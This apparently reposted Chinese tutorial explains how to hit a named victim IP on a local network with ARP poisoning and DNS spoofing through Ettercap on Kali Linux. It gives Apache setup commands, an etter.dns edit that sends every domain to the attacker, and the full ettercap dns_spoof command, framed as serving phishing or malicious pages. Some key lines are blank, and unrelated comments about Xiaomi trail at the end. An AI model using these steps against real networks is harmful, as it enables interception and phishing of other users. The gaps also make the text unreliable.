
DNS欺骗攻击基于中间人攻击。攻击者更改受害者从DNS服务器查询的域名解析结果,给受害者发送恶意网页或钓鱼网页-浏览器依然显示正常的url。dns欺骗攻击
本帖介绍怎么使用Ettercap施行DNS欺骗攻击,实现受害者访问任何网站都转向到攻击者指定的网站。
同一局域网内
受害者IP:192.168.0.106
攻击者系统Kali Linux,IP地址:192.168.0.108
在Kali Linux上创建恶搞网站。dns欺骗攻击
启动Apache:
# service apache2 start

创建恶搞网页:
# vim /var//html/index.html
写入内容:
你可以测试一下(),看看Web是否可以正常提供服务。
# vim /etc/ettercap/etter.dns
在文件中添加一行:
所有域名查询都解析为Kali Linux的IP地址。
DNS欺骗/ARP欺骗:

# ettercap -i wlan0 -T -P dns_spoof -M arp /192.168.0.106///
受害者访问网站:
注意:地址栏的URL并没有变
你也可以使用nslookup命令查询DNS解析结果:
Kali Linux中另一个执行这种攻击的工具:dnsspoof。
# man dnsspoof
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/tongxinshuyu/article-38579-1.html
希望双方透露更多细节
也说明了小米肯关注此事